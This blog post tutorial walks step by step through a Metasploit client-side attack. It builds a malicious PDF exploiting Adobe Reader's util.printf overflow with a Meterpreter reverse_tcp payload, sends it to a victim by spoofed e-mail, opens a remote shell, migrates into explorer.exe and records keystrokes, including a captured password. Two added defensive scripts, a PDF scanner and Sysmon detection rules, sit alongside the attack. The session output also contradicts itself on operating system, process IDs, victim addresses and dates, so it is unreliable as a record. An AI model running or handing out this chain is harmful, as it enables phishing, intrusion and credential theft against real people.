Client Side Exploits in Metasploit

Hajus
May 22, 2023


Social engineering remains one of the most reliable attack vectors: technical controls keep improving, but people still open attachments that appear to come from a trusted partner. This post walks through a client-side exploit end to end with the Metasploit Framework (MSF): build a malicious PDF, deliver it by e-mail, catch the reverse connection, and install a keylogger.

Scenario: our attacker has already done the information gathering, using the Metasploit Framework, Maltego and similar tools to collect e-mail addresses and the other details needed for a targeted client-side attack.

After a dumpster dive and some scraping of e-mail addresses from the web, the attacker knows two things:

  1. The victim organization employs “Best Computers” for technical services.
  2. The IT Department’s email address is itdept@victim.com.

Objective: take control of the IT Department’s computer and deploy a keylogger, so that passwords and other sensitive data can be harvested.

Exploitation technique: we start in msfconsole, the command-line interface of the Metasploit Framework, and build a PDF that looks like a routine document from the vendor and, in this scenario, is not flagged by the victim’s antivirus.

The vulnerability used is the Adobe Reader ‘util.printf()’ JavaScript function stack buffer overflow (CVE-2008-2992, fixed in Adobe Reader 8.1.3). util.printf() does not bound-check the width of a user-supplied format string, so a call with an enormous width specifier (for example a “%45000f” conversion) overflows a stack buffer. An attacker who gets the victim to open a crafted PDF can execute arbitrary code with the privileges of the user running Reader, or simply crash the application. The exploit depends on JavaScript being enabled in Reader, which was the default for the affected versions.
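A defender’s counterpart to that paragraph, added here as an example rather than taken from the post or from the Metasploit module: a static triage script that looks for the PDF names which cause JavaScript to run on open (/OpenAction, /AA, /JavaScript, /JS), inflates FlateDecode streams so the script body is visible, and flags a util.printf call whose width specifier is far beyond anything legitimate. It scans a constructed minimal PDF built inline (both raw and compressed) rather than the file Metasploit generates; the token list and the 512-character width threshold are assumptions chosen for the example.

```python
import re
import zlib

# PDF names that cause JavaScript to run when the document is opened, plus
# the JavaScript calls most often seen in Reader exploits of this era.
# Assumed list for this example, not an exhaustive signature set.
SUSPECT_NAMES = [b"/OpenAction", b"/AA", b"/JavaScript", b"/JS", b"/Launch"]
SUSPECT_CALLS = [b"util.printf", b"unescape(", b"eval(", b"Collab.", b"getAnnots"]

# util.printf("%45000f", n): the width is the overflow trigger.
PRINTF_WIDTH_RE = re.compile(rb"util\.printf\s*\(\s*[\"']%[-+ #0]*(\d+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
MAX_SANE_WIDTH = 512  # assumption for this example, not a published threshold


def inflated_streams(pdf: bytes):
    """Yield the inflated body of every zlib (FlateDecode) stream in the file."""
    for m in STREAM_RE.finditer(pdf):
        try:
            yield zlib.decompress(m.group(1))
        except zlib.error:
            continue  # uncompressed or non-zlib stream: already visible in pdf


def scan_pdf(pdf: bytes) -> dict:
    """Count suspicious tokens in the raw file and its inflated streams."""
    views = [pdf, *inflated_streams(pdf)]
    hits = {}
    for token in SUSPECT_NAMES + SUSPECT_CALLS:
        n = sum(v.count(token) for v in views)
        if n:
            hits[token.decode()] = n
    widths = [int(w) for v in views for w in PRINTF_WIDTH_RE.findall(v)]
    max_width = max(widths, default=0)

    has_js = "/JavaScript" in hits or "/JS" in hits
    auto_run = "/OpenAction" in hits or "/AA" in hits
    if max_width > MAX_SANE_WIDTH or (has_js and any(c.decode() in hits for c in SUSPECT_CALLS)):
        verdict = "suspicious"
    elif has_js or auto_run or "/Launch" in hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "printf_max_width": max_width, "verdict": verdict}


# Constructed samples, not the Metasploit-generated file: a minimal PDF whose
# OpenAction runs JavaScript calling util.printf with an oversized width.
JS_BODY = b'var num = 1.1; util.printf("%45000f", num);'


def build_sample(compress: bool) -> bytes:
    """Minimal malicious PDF; the JS stream is optionally FlateDecode-compressed."""
    body = zlib.compress(JS_BODY) if compress else JS_BODY
    filt = b"/Filter /FlateDecode " if compress else b""
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"3 0 obj << /S /JavaScript /JS 4 0 R >> endobj\n"
        b"4 0 obj << " + filt + b"/Length " + str(len(body)).encode() + b" >>\n"
        b"stream\n" + body + b"\nendstream\nendobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


def build_benign() -> bytes:
    """Minimal PDF with no actions and no JavaScript."""
    return (
        b"%PDF-1.4\n"
        b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
        b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
        b"trailer << /Root 1 0 R >>\n%%EOF\n"
    )


if __name__ == "__main__":
    samples = [("raw", build_sample(False)), ("deflated", build_sample(True)), ("benign", build_benign())]
    for label, pdf in samples:
        print(label, scan_pdf(pdf))
```

Run it directly to scan the built-in samples, or call scan_pdf() on the bytes of a real attachment. The check is deliberately crude: it misses JavaScript hidden in object streams, split across string concatenations or encoded in other filters, and a Reader with JavaScript disabled and patched past 8.1.3 is a far better control than any attachment scan.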

So we start by creating our malicious PDF file for use in this client side exploit.

msf > use exploit/windows/fileformat/adobe_utilprintf
msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf
FILENAME => BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_utilprintf) > set LHOST 192.168.8.122
LHOST => 192.168.8.122
msf exploit(adobe_utilprintf) > set LPORT 4444
LPORT => 4444
msf exploit(adobe_utilprintf) > show options

Module options (exploit/windows/fileformat/adobe_utilprintf):

Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME BestComputers-UpgradeInstructions.pdf yes The file name.


Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.8.122 yes The listen address
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 Adobe Reader v8.1.2 (Windows XP SP3 English)

Once all the options are set the way we want, we run exploit to generate the file.

msf exploit(adobe_utilprintf) > exploit

[*] Creating 'BestComputers-UpgradeInstructions.pdf' file...
[*] BestComputers-UpgradeInstructions.pdf stored at /root/.msf4/local/BestComputers-UpgradeInstructions.pdf
msf exploit(adobe_utilprintf) >

The file is written under /root/.msf4/local/, Metasploit’s default location for generated files, not in the current directory. Before sending it to the victim we need a listener for the reverse connection, and exploit/multi/handler in msfconsole does that. LHOST and LPORT must match what was compiled into the PDF’s payload; if more than one victim may open the file, also set ExitOnSession false and run exploit -j so the handler keeps accepting sessions after the first one.

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set LHOST 192.168.8.122
LHOST => 192.168.8.122
msf exploit(handler) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...

With the listener waiting, the next step is delivery. We have the IT Department’s address from reconnaissance, so we use sendEmail, a small command-line SMTP client, to send the PDF as an attachment with a forged sender in a single line: any From address, any recipient, any SMTP server, a subject and the attachment.

Nothing in SMTP itself stops the forged From address. The message only fails if the receiving mail server checks SPF, DKIM or DMARC for the spoofed domain and that domain publishes a strict policy. In this lab the SMTP server at 192.168.8.131 simply relays the message for us, which is what makes the e-mail look legitimate enough for the victim to open the attachment.

root@kali:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u "Important Upgrade Instructions" -a /root/.msf4/local/BestComputers-UpgradeInstructions.pdf
Reading message body from STDIN because the '-m' option was not used.
If you are manually typing in a message:
- First line must be received within 60 seconds.
- End manual input with a CTRL-D on its own line.

IT Dept,

We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems.

Sincerely,

Best Computers Tech Support
Aug 24 17:32:51 kali sendEmail[13144]: Message input complete.
Aug 24 17:32:51 kali sendEmail[13144]: Email was sent successfully!

As shown above, the script accepts any From (-f) address, any To (-t) address, any SMTP (-s) server, a subject (-u) and the attachment (-a). Because -m was not given, it reads the message body from standard input: we type the text, press CTRL+D, and the e-mail goes out to the victim.

On the victim’s side, our IT Department employee comes in for the day, logs into his computer and checks his e-mail.

He sees the important-looking document and, as he always does, saves it to his desktop so he can scan it with his favourite antivirus program.

The scan reports the file as clean, so he opens it to apply the ‘upgrade’ right away. Adobe Reader launches but sits on a greyed-out window and never renders a document: the embedded JavaScript runs while the file loads and hands control to the payload. Back on the attacker’s machine, this is what appears:

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.8.122:4444 -> 192.168.8.130:49322)

meterpreter >

We now have a Meterpreter shell on the victim’s computer through a malicious PDF client-side exploit. The sensible next steps are to migrate out of AcroRd32.exe, so the session survives when the user kills the hung Reader window; collect system information; start the keylogger; and continue into the network. The post/windows/manage/migrate module takes care of the first step and, in this run, moves the session into explorer.exe. Note that the use priv step further down is a holdover from older Meterpreter: current builds load the priv extension automatically, and the use command has been replaced by load.

meterpreter > ps

Process list
============

PID Name Path
--- ---- ----
852 taskeng.exe C:\Windows\system32\taskeng.exe
1308 Dwm.exe C:\Windows\system32\Dwm.exe
1520 explorer.exe C:\Windows\explorer.exe
2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe
2196 VMwareUser.exe C:\Program Files\VMware\VMware Tools\VMwareUser.exe
3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
3452 AcroRd32.exe C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe

meterpreter > run post/windows/manage/migrate

[*] Running module against V-MAC-XP
[*] Current server process: svchost.exe (1076)
[*] Migrating to explorer.exe...
[*] Migrating into process ID 816
[*] New server process: Explorer.EXE (816)

meterpreter > sysinfo
Computer: Hajus-PC
OS : Windows Vista (Build 6000, ).

meterpreter > use priv
Loading extension priv...success.

meterpreter > run post/windows/capture/keylog_recorder

[*] Executing module against V-MAC-XP
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
[*] Recording keystrokes...

root@kali:~# cat /root/.msf4/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt
Keystroke log started at Wed Mar 23 09:18:36 -0600 2011
Support, I tried to open ti his file 4 times with no success. I even had my admin and CFO tru y it, but no one can get it to p open. I turned on the rmote access server so you can log in to fix our p this problem. Our user name is MElas and password for that session is 23@#$mEDS.
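Looking back at the session from the defender’s side, two things were visible on the endpoint: the reader process opened a TCP connection to the handler, and the migrate step created a thread inside another process. The script below is an added example, not part of the original post, that runs those two detections over constructed Sysmon-style events (Event ID 3 NetworkConnect and Event ID 8 CreateRemoteThread, encoded here as JSON lines): a document reader connecting to a non-web port, and a document reader creating a remote thread in another process. The field names follow Sysmon’s schema, but the event values, the reader list and the port whitelist are assumptions invented for the example from the session above.

```python
import json

# Document readers that have no business talking to arbitrary ports or
# injecting into other processes. Assumed list for this example.
READER_IMAGES = {"acrord32.exe", "acrobat.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
WEB_PORTS = {80, 443}  # updater/licensing traffic; anything else is odd

# Constructed Sysmon-style events as JSON lines (field names follow Sysmon,
# values are invented from the session in the post): the reader calling back
# to the handler, the migrate step seen as CreateRemoteThread into explorer,
# a normal browser connection, and a reader connection on 443.
SAMPLE_EVENTS = r"""
{"EventID": 3, "Image": "C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe", "ProcessId": 3452, "DestinationIp": "192.168.8.122", "DestinationPort": 4444, "Protocol": "tcp"}
{"EventID": 8, "SourceImage": "C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe", "SourceProcessId": 3452, "TargetImage": "C:\\Windows\\explorer.exe", "TargetProcessId": 1520}
{"EventID": 3, "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "ProcessId": 3176, "DestinationIp": "203.0.113.10", "DestinationPort": 443, "Protocol": "tcp"}
{"EventID": 3, "Image": "C:\\Program Files\\Adobe\\Reader 8.0\\Reader\\AcroRd32.exe", "ProcessId": 3452, "DestinationIp": "192.168.8.5", "DestinationPort": 443, "Protocol": "tcp"}
"""


def image_name(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def detect(events_jsonl: str) -> list:
    """Return one alert dict per matching event, in input order."""
    alerts = []
    for line in events_jsonl.strip().splitlines():
        ev = json.loads(line)
        if ev["EventID"] == 3 and image_name(ev["Image"]) in READER_IMAGES:
            # Rule 1: a document reader connecting anywhere but the web ports.
            port = int(ev["DestinationPort"])
            if port not in WEB_PORTS:
                alerts.append({
                    "rule": "reader_outbound_nonweb",
                    "pid": ev["ProcessId"],
                    "dest": f"{ev['DestinationIp']}:{port}",
                })
        elif ev["EventID"] == 8 and image_name(ev["SourceImage"]) in READER_IMAGES:
            # Rule 2: a document reader creating a thread in another process,
            # which is what a classic Meterpreter migrate looks like.
            alerts.append({
                "rule": "reader_remote_thread",
                "pid": ev["SourceProcessId"],
                "target": image_name(ev["TargetImage"]),
                "target_pid": ev["TargetProcessId"],
            })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The port whitelist is the weak spot: a windows/meterpreter/reverse_https payload listening on 443 passes the first rule, and the fourth sample event shows exactly that gap. The remote-thread rule does not depend on the port, and either alert becomes much stronger when correlated with the reader having been launched from the mail client moments earlier. Treat Event ID 8 as one signal rather than the signal, since injection techniques that avoid CreateRemoteThread exist.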

Conclusion: client-side exploits delivered through social engineering remain a serious threat to organisations and individuals, and the Metasploit Framework puts the whole chain, from file generation to post-exploitation, within reach of security professionals and attackers alike. Understanding how the chain works is what lets defenders break it: keep document readers patched and PDF JavaScript disabled where possible, treat unexpected attachments with suspicion however plausible the sender looks, and watch for reader processes that open network connections or inject into other processes.

Disclaimer: It is crucial to emphasize that this blog post is intended for educational purposes only. The utilization of client-side exploits without proper authorization is illegal and unethical. We encourage readers to employ their knowledge and skills responsibly, ensuring they adhere to all legal and ethical guidelines in their cybersecurity endeavors.

Remember, knowledge is power, and with great power comes great responsibility. Let us join forces to fortify our digital defenses and promote a more secure online world.
